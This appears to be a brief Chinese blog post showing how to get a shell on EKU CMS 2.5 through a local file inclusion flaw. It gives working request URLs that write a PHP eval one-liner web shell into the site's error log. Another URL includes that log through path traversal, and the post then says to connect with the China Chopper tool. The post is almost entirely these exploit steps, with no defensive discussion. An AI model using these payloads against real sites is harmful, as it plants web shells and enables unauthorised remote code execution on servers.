1. 程式人生 > >易酷cms本地包含漏洞拿shell

易酷cms本地包含漏洞拿shell

網站 包含 規則 shell blog 包含漏洞 cnblogs 目錄 連接

測試版本:易酷cms2.5

包含一句話:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])}

技術分享圖片

會在網站的/temp/Logs/目錄下生成一個錯誤日誌,命名規則為年_月_日

技術分享圖片

錯誤日誌內容

技術分享圖片

包含錯誤日誌,地址:http://localhost/ekucms2.5/?s=my/show/id/\..\temp\logs\17_12_02.log

技術分享圖片

直接用菜刀連接

技術分享圖片

連接成功

技術分享圖片

易酷cms本地包含漏洞拿shell